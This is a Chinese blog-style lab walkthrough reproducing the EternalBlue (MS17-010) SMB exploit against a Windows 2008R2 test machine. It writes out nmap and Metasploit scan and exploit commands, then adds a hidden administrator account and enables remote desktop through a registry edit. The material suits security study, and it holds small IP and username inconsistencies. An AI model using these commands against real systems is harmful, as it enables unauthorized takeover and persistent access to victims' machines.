永恒之蓝漏洞复现
清明节闲得无聊,突然想起2017年差不多这时候爆发的利用永恒之蓝漏洞进行传播的雷索病毒,今天又重现了一下,顺便记录一下。
概述:永恒之蓝漏洞有多危险,只要开着机,且开启445端口(文件共享端口)攻击者可以获得计算机的权限,能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
复现场景:
攻击机:Linux kali(IP:192.168.114.131)
靶机:Windows 2008R2 (IP:192.168.114.147)
复现流程大致是这样的:
MSF框架---->使用auxiliary模块扫描–>使用exploit攻击获取目标shell–>添加用户—>修改目标远程桌面连接项–>远程连接
下面开始复现:
1、使用nmap探测目标
nmap -r 192.168.114.147
探测结果显示445端口是开启的,有可能存在永恒之蓝漏洞,但是还不能确定,因为它有可能打了补丁;接下来使用MSF攻击框架,使用EXP进行进一步确定。
2、打开msf框架 msfconsole :
搜索ms17-010代码 search ms17_010 :
这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
3.使用ms17-010扫描模块,对靶机Win7进行扫描
使用模块: use auxiliary/scanner/smb/smb_ms17_010
(可以使用info命令进行查看需要配置项)
设置目标ip或网段
msfauxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.114.147
执行扫描: msfauxiliary(scanner/smb/smb_ms17_010) > run
可以发现目标主机存在永恒之蓝漏洞的,接下来使用EXP攻击模块进行攻击。
- 使用ms17-010攻击模块,对靶机Win7进行攻击
使用模块
msf> use exploit/windows/smb/ms17_010_eternalblue
同样需要配置攻击目标IP。
设置攻击目标ip
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST192.168.23.133
查看设置选项
msfexploit(windows/smb/ms17_010_eternalblue) > show options
至此,攻击模块可以使用了,接下来就见证奇迹的时候了,发起攻击。
执行攻击
msfexploit(windows/smb/ms17_010_eternalblue) > run
经过攻击获得了目标的metepreter(一种shell)。在这里输入shell就可以获得目标的cmd终端。
至此我们已经拿到了目标主机的命令终端,可以执行任何命令了,比如查看系统信息:
但是这不是我们的终点,我们要的是直接拿到桌面,所以接下来就要创建账户。
5.通过shell对目标服务器进行控制
创建新用户zzn : netuser zzz 123456 /add
将用户zzz添加至管理员组 : netlocalgroup administrators zzz /add
开启远程桌面功能
REGADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f
到这里我们已经配置好了目标主机,只需要一步就能到达对方的桌面,那就是远程桌面连接。
kali 远程桌面连接目标服务器:
rdesktop192.168.114.147:3389
回车之后见证奇迹:
成功连接到了对方服务器的桌面,一切努力只为了这一步,此时我们可以“为所欲为”了。